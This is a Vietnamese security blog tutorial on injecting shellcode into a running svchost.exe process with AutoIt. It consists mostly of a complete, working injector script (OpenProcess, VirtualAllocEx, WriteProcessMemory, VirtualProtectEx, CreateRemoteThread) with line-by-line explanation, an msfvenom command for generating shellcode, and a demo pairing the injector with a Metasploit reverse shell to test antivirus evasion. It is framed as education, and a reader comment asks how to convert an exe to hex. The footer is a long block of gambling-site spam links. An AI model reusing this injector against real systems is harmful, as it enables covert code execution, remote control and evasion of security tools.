• Kiến thức
  • Network
  • Security
  • Software
  • Thủ thuật
  • Tin học văn phòng
  • Tin tức
  • Mail ảo tạm thời miễn phí
  • Tools tra cứu thông tin
AnonyViet
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
AnonyViet
No Result
View All Result

Cách thực hiện kĩ thuật tấn công Shellcode Injection với Autoit

Khám phá kỹ thuật Shellcode Injection với AutoIt: chèn mã độc vào tiến trình, thực thi lệnh nguy hại. Hiểu để phòng thủ trong an ninh mạng!

Thanh Kim by Thanh Kim
08/03/2025 - Updated on 25/07/2025
in Basic Hacking
A A
2

Mục lục bài viết

  1. Shellcode Injection là gì ?
  2. Cách thực hiện kĩ thuật Shellcode Injection
    1. 1. Chuẩn bị môi trường
    2. 2. Viết code Autoit thực hiện kĩ thuật Shellcode Injection
      1. Phần khai báo thư viện
      2. Khai báo biến toàn cục
      3. Gọi các hàm chính
      4. Hàm _CheckProcess()
      5. Hàm Find_Process()
      6. Hàm _IsProcessOwner()
      7. Hàm _ptr()
      8. Hàm sizeof()
      9. Hàm _ProcessInjection()
  3. Tổng kết cách hoạt động của toàn bộ code
  4. Câu hỏi thường gặp
    1. Shellcode Injection là gì và tại sao nó nguy hiểm?
    2. AutoIt đóng vai trò gì trong Shellcode Injection?
    3. Bài viết này có an toàn để sử dụng không?

Việc hiểu rõ các kỹ thuật tấn công là một phần quan trọng để phát triển các biện pháp phòng thủ hiệu quả. Một trong những phương pháp tấn công nổi bật là Shellcode Injection, cho phép hacker chèn mã độc trực tiếp vào bộ nhớ của chương trình đang chạy để thực thi các lệnh độc hại. Kết hợp với AutoIt là một ngôn lập trình dễ sử dụng làm cho kỹ thuật này trở nên linh hoạt và nguy hiểm hơn bao giờ hết.

Tham gia kênh Telegram của AnonyViet 👉 Link 👈

Trong bài viết này, chúng ta sẽ cùng khám phá cách thực hiện kỹ thuật Shellcode Injection với AutoIt, từ những khái niệm cơ bản đến các bước thực hành cụ thể, nhằm giúp bạn hiểu sâu hơn về cách thức hoạt động của nó

Các bài viết liên quan

Cách Hacker Bypass AV xâm nhập Windows với Autoit

Cách Hacker Bypass AV xâm nhập Windows với Autoit

09/01/2024 - Updated on 24/07/2025
Tải bộ mã nguồn game Mario viết bằng AutoIT với nhiều tính năng thú vị 3

Tải bộ mã nguồn game Mario viết bằng AutoIT với nhiều tính năng thú vị

21/01/2019 - Updated on 25/07/2025
Cách đo thời gian chạy 1 lệnh trong AutoIT 4

Cách đo thời gian chạy 1 lệnh trong AutoIT

19/01/2018 - Updated on 20/01/2018
Share source code Autoit giấu file bằng Password

Share source code Autoit giấu file bằng Password

26/11/2017 - Updated on 20/12/2019

Lưu ý: Bài viết này chỉ dành cho mục đích giáo dục, nghiên cứu và học tập. Anonyviet không chịu trách nhiệm trước mọi hành vi bất hợp pháp

Shellcode Injection là gì ?

Trước khi đi vào chi tiết, hãy cùng tìm hiểu khái niệm cơ bản. Shellcode là một đoạn mã nhị phân nhỏ, thường được viết bằng ngôn ngữ Assembly, nhằm mục đích thực thi một tác vụ cụ thể (như mở shell, tải phần mềm độc hại,…). Shellcode Injection là quá trình chèn đoạn mã này vào bộ nhớ của một tiến trình đang chạy, sau đó buộc tiến trình đó thực thi mã.

Với khả năng thao tác bộ nhớ và gọi các hàm API của Windows, Autoit là ngôn ngữ lập trình lý tưởng để thực hiện kỹ thuật này. Chúng ta sẽ tận dụng các hàm có sẵn trong các thư viện của Autoit để tương tác với hệ thống

Cách thực hiện kĩ thuật Shellcode Injection

1. Chuẩn bị môi trường

Để bắt đầu, bạn cần chuẩn bị những thứ sau:

  • Tải và cài đặt AutoIt: Đảm bảo bạn có cả trình soạn thảo SciTE để viết code
  • Shellcode: Bạn có thể tạo shellcode bằng các công cụ như Metasploit (msfvenom) hoặc tự viết bằng Assembly. Ví dụ, dùng lệnh sau trong Metasploit để tạo shellcode mở calculator
msfvenom -p windows/x64/exec CMD=calc.exe -f hex

Kết quả sẽ là một chuỗi hex như: fc4883e4…32e65786500

  • Kiến thức cơ bản: Hiểu về hàm API Windows như VirtualAlloc, RtlMoveMemory, và CreateThread

2. Viết code Autoit thực hiện kĩ thuật Shellcode Injection

Phần khai báo thư viện

#include <Process.au3>
#include <Memory.au3>
#include <WinAPI.au3>
#include <Array.au3>

Đây là các thư viện (library) mà AutoIt sử dụng để cung cấp các hàm hỗ trợ:

  • <Process.au3>: Hỗ trợ làm việc với tiến trình (process), như lấy tên, kiểm tra PID.
  • <Memory.au3>: Cung cấp hàm để thao tác bộ nhớ, như cấp phát hoặc ghi dữ liệu.
  • <WinAPI.au3>: Cho phép gọi các hàm API của Windows (như OpenProcess, WriteProcessMemory).
  • <Array.au3>: Hỗ trợ làm việc với mảng (array), dùng để quản lý danh sách tiến trình.

Để dễ hiểu hơn bạn hãy nghĩ đây là những “cuốn sách hướng dẫn” mà chương trình cần để biết cách làm việc với hệ điều hành

Khai báo biến toàn cục

Global $hexShellcode = "fc4883e4...32e65786500"

$hexShellcode là shellcode dạng mã hexa (chuỗi số và chữ cái như fc4883e4f). Đây là đoạn mã nhỏ sẽ được tiêm vào tiến trình đích để thực thi

Gọi các hàm chính

_CheckProcess()
_ProcessInjection()

Hai hàm này chính là “đầu não” của chương trình:

  •  _CheckProcess(): Kiểm tra xem tiến trình đích (svchost.exe) có đang chạy không
  •  _ProcessInjection(): Thực hiện việc tiêm shellcode vào tiến trình svchost.exe

Hàm _CheckProcess()

Func _CheckProcess()
    ConsoleWrite("[+] Checking for target process" & @CRLF & @CRLF)

    Global $targetPID = Find_Process("svchost.exe")

    If Not $targetPID = 0 Then
        Global $targetProcName = _ProcessGetName($targetPID)
        ConsoleWrite("[+] Target process is running (" & $targetProcName &")" & @CRLF & @CRLF)
    ElseIf $targetPID = 0 Then
        ConsoleWrite("[!] Target process is not running. Exiting." & @CRLF & @CRLF)
        Exit
    EndIf
EndFunc

Hàm này kiểm tra xem tiến trình svchost.exe có đang chạy không và lấy mã định danh (PID) của nó

Xem thêm:  Những phương pháp Bảo mật giúp bạn an toàn hơn trên Internet

Chi tiết:

  • ConsoleWrite(“[+] Checking for target process” & @CRLF & @CRLF): In thông báo “Đang kiểm tra tiến trình đích”
  • $targetPID = Find_Process(“svchost.exe”): Gọi hàm Find_Process để tìm PID của svchost.exe
  • If Not $targetPID = 0: Nếu tìm thấy PID (khác 0):

– $targetProcName = _ProcessGetName($targetPID): Lấy tên tiến trình từ PID (dùng thư viện <Process.au3>)

– In thông báo xác nhận tiến trình đang chạy

  • ElseIf $targetPID = 0: Nếu không tìm thấy, in thông báo lỗi và thoát chương trình (Exit)

Hàm Find_Process()

Func Find_Process($process)
    $loggedInUser = @UserName
    $processList = ProcessList()
    Dim $matchingProcesses[1]

    For $i = 1 To $processList[0][0]
        $processName = $processList[$i][0]
        $processPID = $processList[$i][1]

        If StringInStr($processName, $process) And _IsProcessOwner($processPID, $loggedInUser) Then
            ReDim $matchingProcesses[UBound($matchingProcesses) + 1]
            $matchingProcesses[UBound($matchingProcesses) - 1] = $processPID
        EndIf
    Next

    If UBound($matchingProcesses) > 1 Then
        $randomIndex = Random(1, UBound($matchingProcesses) - 1, 1)
        $randomPID = $matchingProcesses[$randomIndex]
        Return $randomPID
    Else
        Return ""
    EndIf
EndFunc

Hàm này tìm tất cả các tiến trình có tên chứa $process (ở đây là “svchost.exe”) và chọn ngẫu nhiên một PID thuộc về người dùng hiện tại. Chi tiết:

  • $loggedInUser = @UserName: Lấy tên người dùng hiện tại (ví dụ: “Admin”).
  • $processList = ProcessList(): Lấy danh sách tất cả tiến trình đang chạy trên máy
  • Dim $matchingProcesses[1]: Tạo một mảng để lưu các PID phù hợp
  • Vòng lặp For:

– Duyệt qua từng tiến trình trong $processList

– StringInStr($processName, $process): Kiểm tra xem tên tiến trình có chứa “svchost.exe” không

– _IsProcessOwner($processPID, $loggedInUser): Kiểm tra xem tiến trình thuộc về người dùng hiện tại không

– Nếu cả hai điều kiện đúng, thêm PID vào mảng $matchingProcesses

Kết quả: 

  • Nếu có nhiều hơn 1 tiến trình khớp, chọn ngẫu nhiên một PID bằng Random() và trả về
  • Nếu không tìm thấy, trả về chuỗi rỗng

Hàm _IsProcessOwner()

Func _IsProcessOwner($processPID, $username)
    Local $aWMI = ObjGet("winmgmts:\\.\root\cimv2")
    Local $colItems = $aWMI.ExecQuery("Select * from Win32_Process where ProcessID=" & $processPID)

    For $objItem In $colItems
        If $objItem.GetOwner() = $username Then
            Return 1
        EndIf
    Next
    Return 0
EndFunc

Hàm này kiểm tra xem tiến trình với PID cụ thể có thuộc về người dùng hiện tại ($username) không. Chi tiết:

  • $aWMI = ObjGet(“winmgmts:\\.\root\cimv2”): Kết nối đến WMI (Windows Management Instrumentation) để truy vấn thông tin hệ thống
  • $colItems = $aWMI.ExecQuery(…): Truy vấn thông tin về tiến trình có PID là $processPID
  • Vòng lặp: Kiểm tra chủ sở hữu (GetOwner) của tiến trình. Nếu khớp với $username, trả về 1 (đúng); nếu không, trả về 0 (sai)

Để dễ hiểu hơn thì phần này giống như kiểm tra xem số điện thoại trong danh bạ có phải của bạn không, để tránh gọi nhầm người khác

Hàm _ptr()

Func _ptr($s, $e = "")
    If $e <> "" Then Return DllStructGetPtr($s, $e)
    Return DllStructGetPtr($s)
EndFunc

Hàm này lấy “con trỏ” (địa chỉ trong bộ nhớ) của một cấu trúc dữ liệu (DllStruct) Chi tiết:

  • $s: Cấu trúc cần lấy con trỏ
  • $e: Phần tử cụ thể trong cấu trúc (nếu có, nhưng ở đây không dùng)
  • DllStructGetPtr: Trả về địa chỉ bộ nhớ của cấu trúc

Hàm sizeof()

Func sizeof($s)
    Return DllStructGetSize($s)
EndFunc
  • Ý nghĩa: Hàm này trả về kích thước (số byte) của một cấu trúc dữ liệu
  • Chi tiết: DllStructGetSize tính kích thước dựa trên định nghĩa của cấu trúc

Hàm _ProcessInjection()

Func _ProcessInjection()
    Local $autoItshellcode = "0x" & $hexShellcode
    Local $shellcodeBuffer = DllStructCreate("byte[" & BinaryLen($autoItshellcode) & "]")
    DllStructSetData($shellcodeBuffer, 1, $autoItshellcode)
    ConsoleWrite("[+] Shellcode size: " & sizeof($shellcodeBuffer) & " bytes" & @CRLF & @CRLF)
    ConsoleWrite("[+] Injecting shellcode into PID:" & $targetPID & " (" & $targetProcName &")" & @CRLF & @CRLF)

    $hProcess = _WinAPI_OpenProcess( _
        $PROCESS_ALL_ACCESS, _
        0, _
        $targetPID, _
        True)

    $hRegion = _MemVirtualAllocEx( _
        $hProcess, _
        0, _
        sizeof($shellcodeBuffer), _
        $MEM_COMMIT + $MEM_RESERVE, _
        $PAGE_READWRITE)

    Local $written

    _WinAPI_WriteProcessMemory ( _
        $hProcess, _
        $hRegion, _
        _ptr($shellcodeBuffer), _
        sizeof($shellcodeBuffer), _
        $written)

    $protectCall = DllCall("kernel32.dll", "int", "VirtualProtectEx", _
        "hwnd", $hProcess, _
        "ptr", $hRegion, _
        "ulong_ptr", sizeof($shellcodeBuffer), _
        "uint", 0x20, _
        "uint*", 0)

    $hProtect = $protectCall[0]

    $threadCall = DllCall("Kernel32.dll", "int", "CreateRemoteThread", _
        "ptr", $hProcess, _
        "ptr", 0, _
        "int", 0, _
        "ptr", $hRegion, _
        "ptr", 0, _
        "int", 0, _
        "dword*", 0)

    $hThread = $threadCall[0]
EndFunc

Hàm _ProcessInjection() là hàm giúp đưa mã độc vào tiến trình đích (ở đây là svchost.exe) và chạy nó một cách lén lút, biến tiến trình hợp pháp thành mã độc thực thi. Chi tiết:

Local $autoItshellcode = "0x" & $hexShellcode
Local $shellcodeBuffer = DllStructCreate("byte[" & BinaryLen($autoItshellcode) & "]")
DllStructSetData($shellcodeBuffer, 1, $autoItshellcode)
ConsoleWrite("[+] Shellcode size: " & sizeof($shellcodeBuffer) & " bytes" & @CRLF & @CRLF)
ConsoleWrite("[+] Injecting shellcode into PID:" & $targetPID & " (" & $targetProcName &")" & @CRLF & @CRLF)
  • Shellcode là đoạn mã độc mà chúng ta muốn tiêm vào. Ở đây, $hexShellcode là một chuỗi mã hóa dạng hexa (ví dụ: “fc4883e4f”), và mình thêm “0x” để biến nó thành định dạng mà AutoIt hiểu được
  • Tạo bộ đệm: DllStructCreate tạo một “hộp chứa” (buffer) để lưu shellcode. Kích thước của hộp này bằng độ dài của shellcode (BinaryLen)
  • Đưa shellcode vào hộp: DllStructSetData đặt shellcode vào hộp vừa tạo
  • Thông báo: Hai lệnh ConsoleWrite hiển thị thông tin kích thước shellcode và tiến trình đích (PID và tên) để người dùng biết điều gì đang xảy ra
$hProcess = _WinAPI_OpenProcess( _
$PROCESS_ALL_ACCESS, _
0, _
$targetPID, _
True)
  • Hàm _WinAPI_OpenProcess giống như xin phép hệ điều hành để “mở cửa” tiến trình đích (ở đây là svchost.exe, có mã số $targetPID đã được tìm trước đó)
  • Quyền hạn: $PROCESS_ALL_ACCESS yêu cầu toàn quyền truy cập (đọc, ghi, thực thi) vào tiến trình này
  • Kết quả: $hProcess là “chìa khóa” để ta thao tác với tiến trình đó. Để dễ hiểu hơn giống như bạn cần chìa khóa để vào nhà người khác thì $hProcess chính là chìa khóa mở cửa svchost.exe
$hRegion = _MemVirtualAllocEx( _
    $hProcess, _
    0, _
    sizeof($shellcodeBuffer), _
    $MEM_COMMIT + $MEM_RESERVE, _
    $PAGE_READWRITE)
  • Hàm _MemVirtualAllocEx tạo một “khoảng trống” trong bộ nhớ của tiến trình đích để lưu shellcode. Kích thước khoảng trống này bằng kích thước của shellcode (sizeof($shellcodeBuffer))
  • Quyền truy cập: $PAGE_READWRITE cho phép đọc và ghi vào khoảng trống này. $MEM_COMMIT + $MEM_RESERVE đảm bảo khoảng trống được sử dụng ngay và dành sẵn
  • Kết quả: $hRegion là địa chỉ của khoảng trống vừa tạo
Local $written
_WinAPI_WriteProcessMemory ( _
$hProcess, _
$hRegion, _
_ptr($shellcodeBuffer), _
sizeof($shellcodeBuffer), _
$written)

Hàm _WinAPI_WriteProcessMemory sao chép shellcode từ “hộp chứa” ($shellcodeBuffer) vào khoảng trống ($hRegion) trong tiến trình svchost.exe

Xem thêm:  Cách Hacker Bypass AV xâm nhập Windows với Autoit

Tham số: 

  • $hProcess: Chìa khóa để vào tiến trình scvhost.exe
  • $hRegion: Địa chỉ phòng trống
  •  _ptr($shellcodeBuffer): Con trỏ đến shellcode trong hộp chứa
  • sizeof($shellcodeBuffer): Kích thước dữ liệu cần sao chép
  • $written: Biến lưu số byte đã ghi (dùng để kiểm tra)
$protectCall = DllCall("kernel32.dll", "int", "VirtualProtectEx", _
    "hwnd", $hProcess, _
    "ptr", $hRegion, _
    "ulong_ptr", sizeof($shellcodeBuffer), _
    "uint", 0x20, _
    "uint*", 0)
$hProtect = $protectCall[0]
  • VirtualProtectEx thay đổi quyền truy cập của “phòng trống” từ chỉ đọc/ghi (PAGE_READWRITE) sang có thể thực thi (0x20 là PAGE_EXECUTE_READ).
  • Tại sao cần: Shellcode là mã cần chạy, nên vùng bộ nhớ chứa nó phải được phép “thực thi”
  • Kết quả: $hProtect cho biết việc thay đổi quyền có thành công hay không
$threadCall = DllCall("Kernel32.dll", "int", "CreateRemoteThread", _
    "ptr", $hProcess, _
    "ptr", 0, _
    "int", 0, _
    "ptr", $hRegion, _
    "ptr", 0, _
    "int", 0, _
    "dword*", 0)
$hThread = $threadCall[0]

CreateRemoteThread tạo một thread trong tiến trình svchost.exe để chạy shellcode tại địa chỉ $hRegion

Tham số: 

  • $hProcess: Chìa khóa vào tiến trình
  • $hRegion: Địa chỉ shellcode để chạy
  • Các tham số khác để mặc định (0)

Kết quả: $hThread là mã định danh của thread vừa tạo

Đây là đoạn code hoàn chỉnh:

#include <Process.au3>
#include <Memory.au3>
#include <WinAPI.au3>
#include <Array.au3>

Global $hexShellcode = "fc4883e4f"

_CheckProcess()
_ProcessInjection()

Func _CheckProcess()
    ConsoleWrite("[+] Checking for target process" & @CRLF & @CRLF)

    Global $targetPID = Find_Process("svchost.exe")

    If Not $targetPID = 0 Then
        Global $targetProcName = _ProcessGetName($targetPID)
        ConsoleWrite("[+] Target process is running (" & $targetProcName &")" & @CRLF & @CRLF)

    ElseIf $targetPID = 0 Then
        ConsoleWrite("[!] Target process is not running. Exiting." & @CRLF & @CRLF)
        Exit
    EndIf

EndFunc

Func Find_Process($process)
    $loggedInUser = @UserName
    $processList = ProcessList()
    Dim $matchingProcesses[1]

    For $i = 1 To $processList[0][0]
        $processName = $processList[$i][0]
        $processPID = $processList[$i][1]

        If StringInStr($processName, $process) And _IsProcessOwner($processPID, $loggedInUser) Then
            ReDim $matchingProcesses[UBound($matchingProcesses) + 1]
            $matchingProcesses[UBound($matchingProcesses) - 1] = $processPID
        EndIf
    Next

    If UBound($matchingProcesses) > 1 Then
        $randomIndex = Random(1, UBound($matchingProcesses) - 1, 1)
        $randomPID = $matchingProcesses[$randomIndex]
        Return $randomPID
    Else
        Return ""
    EndIf
EndFunc

Func _ProcessInjection()
    Local $autoItshellcode = "0x" & $hexShellcode
    Local $shellcodeBuffer = DllStructCreate("byte[" & BinaryLen($autoItshellcode) & "]")
    DllStructSetData($shellcodeBuffer, 1, $autoItshellcode)
    ConsoleWrite("[+] Shellcode size: " & sizeof($shellcodeBuffer) & " bytes" & @CRLF & @CRLF)
    ConsoleWrite("[+] Injecting shellcode into PID:" & $targetPID & " (" & $targetProcName &")" & @CRLF & @CRLF)

    $hProcess = _WinAPI_OpenProcess( _
        $PROCESS_ALL_ACCESS, _
        0, _
        $targetPID, _
        True)

    $hRegion = _MemVirtualAllocEx( _
        $hProcess, _
        0, _
        sizeof($shellcodeBuffer), _
        $MEM_COMMIT + $MEM_RESERVE, _
        $PAGE_READWRITE)

    Local $written

    _WinAPI_WriteProcessMemory ( _
        $hProcess, _
        $hRegion, _
        _ptr($shellcodeBuffer), _
        sizeof($shellcodeBuffer), _
        $written)

    $protectCall = DllCall("kernel32.dll", "int", "VirtualProtectEx", _
        "hwnd", $hProcess, _
        "ptr", $hRegion, _
        "ulong_ptr", sizeof($shellcodeBuffer), _
        "uint", 0x20, _
        "uint*", 0)

    $hProtect = $protectCall[0]

    $threadCall = DllCall("Kernel32.dll", "int", "CreateRemoteThread", _
        "ptr", $hProcess, _
        "ptr", 0, _
        "int", 0, _
        "ptr", $hRegion, _
        "ptr", 0, _
        "int", 0, _
        "dword*", 0)

    $hThread = $threadCall[0]

EndFunc

Func _ptr($s, $e = "")
    If $e <> "" Then Return DllStructGetPtr($s, $e)
    Return DllStructGetPtr($s)
EndFunc

Func sizeof($s)
    Return DllStructGetSize($s)
EndFunc

Func _IsProcessOwner($processPID, $username)
    Local $aWMI = ObjGet("winmgmts:\\.\root\cimv2")
    Local $colItems = $aWMI.ExecQuery("Select * from Win32_Process where ProcessID=" & $processPID)

    For $objItem In $colItems
        If $objItem.GetOwner() = $username Then
            Return 1
        EndIf
    Next
    Return 0
EndFunc

Tổng kết cách hoạt động của toàn bộ code

1. _CheckProcess() và Find_Process(): Tìm và kiểm tra xem svchost.exe có chạy không, chọn ngẫu nhiên một PID phù hợp.

Xem thêm:  10 việc cần làm sau khi cài đặt Kali Linux để phục vụ Hacker

2. _ProcessInjection(): Tiêm shellcode vào tiến trình đích qua 6 bước (chuẩn bị, mở tiến trình, cấp phát bộ nhớ, ghi shellcode, cấp quyền thực thi, chạy shellcode)

3. Các hàm hỗ trợ (_ptr, sizeof, _IsProcessOwner): Giúp xử lý chi tiết như lấy địa chỉ, kích thước, và xác minh quyền sở hữu

Kết quả: Shellcode sẽ chạy trong svchost.exe. Tuy nhiên, với $hexShellcode = “fc4883e4f”, đây chỉ là đoạn mã mẫu, nên bạn cần shellcode đầy đủ (ví dụ từ Metasploit)

Và đây là kết quả:

Được rồi, bây giờ mình sẽ tạo một payload reverse shell https từ Metasploit, sau đó thử xem Antivirus có phát hiện ra hay không nhé. Mời các bạn xem demo:

Qua bài viết này, chúng ta đã cùng khám phá cách sử dụng AutoIt để thực hiện kỹ thuật Shellcode Injection. Hiểu biết về nó không chỉ giúp bạn nắm rõ cách hacker xâm nhập, mà còn là nền tảng để xây dựng các biện pháp phòng thủ hiệu quả hơn. Mình mong rằng bạn thực hiện kĩ thuật này chỉ để thử nghiệm trong môi trường an toàn và sử dụng kiến thức này một cách có trách nhiệm để bảo vệ hệ thống, thay vì gây hại. Chúc bạn thành công trên hành trình khám phá thế giới an ninh mạng !

Câu hỏi thường gặp

Shellcode Injection là gì và tại sao nó nguy hiểm?

Shellcode Injection là kỹ thuật chèn mã độc hại (shellcode) vào bộ nhớ của một tiến trình đang chạy để thực thi các lệnh độc hại. Nó nguy hiểm vì cho phép kẻ tấn công thực hiện các hành vi bất hợp pháp trên hệ thống bị xâm phạm mà không cần quyền truy cập trực tiếp.

AutoIt đóng vai trò gì trong Shellcode Injection?

AutoIt là một ngôn ngữ lập trình dễ sử dụng, cung cấp các hàm giúp tương tác với hệ điều hành Windows, bao gồm cả việc thao tác bộ nhớ. Điều này làm cho việc thực hiện Shellcode Injection trở nên dễ dàng hơn và nguy hiểm hơn.

Bài viết này có an toàn để sử dụng không?

Bài viết này chỉ mang tính chất giáo dục và nghiên cứu. Việc sử dụng các kỹ thuật được mô tả trong bài viết cho mục đích bất hợp pháp là hoàn toàn trái pháp luật và tác giả không chịu trách nhiệm về bất kỳ hậu quả nào.

Tags: autoitShellcodeShellcode Injection
Thanh Kim

Thanh Kim

12 năm kinh nghiệm trong lĩnh vực bảo mật, an toàn thông tin: MCSA, MCSE, CEH, CompTIA Security+... Đam mê viết blog

Related Posts

Cách khai thác lỗ hổng DLL Hijacking trên Windows 5
Basic Hacking

Cách khai thác lỗ hổng DLL Hijacking trên Windows

05/03/2025 - Updated on 25/07/2025
Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus 6
Basic Hacking

Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus

10/02/2025 - Updated on 25/07/2025
Snov.io Email Finder: Tìm kiếm email chỉ với tên công ty/ tên miền/ hồ sơ LinkedIn 7
Basic Hacking

Snov.io Email Finder: Tìm kiếm email chỉ với tên công ty/ tên miền/ hồ sơ LinkedIn

14/12/2024 - Updated on 24/07/2025
Capsolver: Giải pháp tự động giải CAPTCHA dành cho doanh nghiệp 8
Basic Hacking

Capsolver: Giải pháp tự động giải CAPTCHA dành cho doanh nghiệp

12/12/2024 - Updated on 24/07/2025
Seekr: Thu thập & quản lý dữ liệu OSINT 9
Basic Hacking

Seekr: Thu thập & quản lý dữ liệu OSINT

22/11/2024 - Updated on 24/07/2025
MyIP: Công cụ kiểm tra thông tin IP toàn diện 10
Basic Hacking

MyIP: Công cụ kiểm tra thông tin IP toàn diện

20/11/2024 - Updated on 24/07/2025
guest

guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

2 Comments
oldest
newest
Inline Feedbacks
View all comments
user1
user1
6 months ago

hi, e dang co 1 file exe, vay lam the nao de convert exe sang hexa vay admin

Reply
Hevin
Hevin
2 months ago
Reply to  user1

Bạn có thể sử dụng công cụ donut để convert sang nhé

Reply
wpdiscuz   wpDiscuz

Liên hệ Quảng Cáo

Lien he AnonyViet

Bài viết mới

Cách xử lý khi Số điện thoại bị người khác đăng ký Zalo 1

Cách xử lý khi Số điện thoại bị người khác đăng ký Zalo

by Thanh Kim
27/10/2025
0

Cảnh giác: Dùng AI "tạo ảnh đã tìm thấy" thú cưng/đồ thất lạc để đòi tiền chuộc 2

Cảnh giác: Dùng AI “tạo ảnh đã tìm thấy” thú cưng/đồ thất lạc để đòi tiền chuộc

by AnonyViet
26/10/2025
0

Cách đóng mọi ứng dụng chỉ trong 1 giây trên Windows 11 3

Cách đóng mọi ứng dụng chỉ trong 1 giây trên Windows 11

by Thanh Kim
26/10/2025
0

Cách làm ảnh thẻ cho con bằng AI siêu nét 4

Cách làm ảnh thẻ cho con bằng AI siêu nét

by Thanh Kim
25/10/2025
0

Giới thiệu

AnonyViet

AnonyViet

Nơi chia sẻ những kiến thức mà bạn chưa từng được học trên ghế nhà trường!

Chúng tôi sẵn sàng đón những ý kiến đóng góp, cũng như bài viết của các bạn gửi đến AnonyViet.

Hãy cùng AnonyViet xây dựng một cộng đồng CNTT lớn mạnh nhất!

Giới thiệu

AnonyViet là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. AnonyViet cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Liên hệ

Email: support[@]anonyviet.com

1409 Hill Street #01-01A
Old Hill Street Police Station
Singapore 179369

 

DMCA.com Protection Status

Bình luận gần đây

  • nhat trong Share key Driver Booster v13 Pro miễn phí 6 tháng
  • Việt trong Nhận 25.000 điểm Viettel miễn phí cực dễ dàng nhân dịp sinh nhật 25 năm
  • Việt trong [Update] Cách nhận Google AI Pro 1 năm miễn phí bằng Telegram
  • HAI trong [Update] Cách nhận Google AI Pro 1 năm miễn phí bằng Telegram
  • thịnh trong Hướng dẫn nhận key IObit Uninstaller 14 miễn phí 6 tháng
  • veoe trong Bí quyết tạo ảnh cầm bó hoa đẹp như bìa tạp chí với Nano Banana
  • AnonyViet trong [Update] Cách nhận Google AI Pro 1 năm miễn phí bằng Telegram
  • mon trong [Update] Cách nhận Google AI Pro 1 năm miễn phí bằng Telegram
  • Felizz23 trong Namecheap khuyến mãi 3 Domain giá 0$
  • AnonyViet trong [Update] Cách nhận Google AI Pro 1 năm miễn phí bằng Telegram
  • ann trong [Update] Cách nhận Google AI Pro 1 năm miễn phí bằng Telegram
  • Kim trong Namecheap khuyến mãi 3 Domain giá 0$
  • em hậu trong Cách chặn quảng cáo trên iPhone, iPad và Mac (cả web và app)
  • Võ Sĩ Cua trong Share key Driver Booster v13 Pro miễn phí 6 tháng
  • Tuấn Tú trong Share key Driver Booster v13 Pro miễn phí 6 tháng
  • Quốc Vũ trong Share key Driver Booster v13 Pro miễn phí 6 tháng
  • Ski trong Cách chặn quảng cáo trên iPhone, iPad và Mac (cả web và app)
  • linh trong Share key Driver Booster v13 Pro miễn phí 6 tháng
  • Heheehe🐧 trong Top 10 Phần mềm miễn phí cho Windows 11 nên cài
  • Jdi trong Download Hack of Products v5 APK – Hack vật phẩm trên Android

©2025 AnonyViet - Chúng tôi mang đến cho bạ những kiến thức bổ ích về CNTT Công nghệ kết quả xổ số hôm nay xoilac 8x bet https://cwfun.org/ 33win Ae888 kubet kubet 8kbet 99ok xin88 good88 xn88 kubet RR88 cakhiatv f8bet https://qq883a.com/ XX88 mu88 casino f168 fm88 xin88 https://918xxy.com/ kubet thailand vip66 xoso66 vip66 xoso66 https://tp88fun.com/ https://daga.rocks hello88 qq88 GK88 PG88 Xoso66 Vip66 hitclub bong99 Ga6789 XOSO66 new882.info Hi88 8day Thabet 33win Bk8 fun88 789win w88 nhà cái uy tín Go88 sunwin sunwin jun88 rikvip hitclub sunwin go88 s666 sv388 12bet v9bet betvisa betvisa vin777 vin777 Thabet press ee88 bet88 abc8 c54 i9bet ok365 ae888 https://keonhacai.fund/ sunwin https://ok9393.com/ sv368pro cakhiatv socolive QQ88 TP88 Xoso66 xoso66 u888 79king pg88 f168 88vv https://mm88.today/ mu88 com 8kbet https://qq88pro.vip/ xoso66 98win fun88.supply king88 33win sv388 v9bet s666 https://max88rl.com/ https://ok365rl.com/ EE88 FB88 TYPHU88 https://xx88.ink/ https://da88.design/ 789f Kkwin 79king xin88 XX88 https://mb66co.com/ https://fun88.supply/ thapcamtv thapcamtv https://rr88.navy/ gem88 F8BET80 sa88 https://q23win.com/ 32win 32win 78win 68win BET88 luongsontv luongsontv https://vankhanhtv.cc/ 9bet https://nohutm.com SODO fun88 sunwin BL555 u888 https://nohumo.com 8xbet W88 link cola tv colatv trực tiếp bóng dá colatv trực tiếp bóng dá colatv colatv truc tiep bong da colatv colatv bóng dá trực tiếp 58win https://s68win.com/ 58WIN NOHU90 https://hm8805.com/ GK88 TV88 188bet ax88 8KBET 69VN 33WIN 32win Kuwin https://bbet88b.com/ Jun88.estate OK9 SHBET https://xx88.center/ vswin 789PCOM NHÀ CÁI MMOO bắn cá TT88COM GO 99 https://k8cc.wiki/ RR88 RR88 ee88 tài xỉu online uy tín Game bài đổi thưởng uy tín kèo nhà cái kèo nhà cái 5 789f 188bet w88 Gem88 Thabet jun88 kclub vip79 dv88 Gi8 For88 Rikbet 8kbet 6ff AX88 Kkwin HZ88 tv88 ABC8 https://ww88.me/ https://nowgoal.ws/ https://tylekeonhacai.me/ https://keonhacai.org.vc/ sodo casino https://xx88.ac/ C54 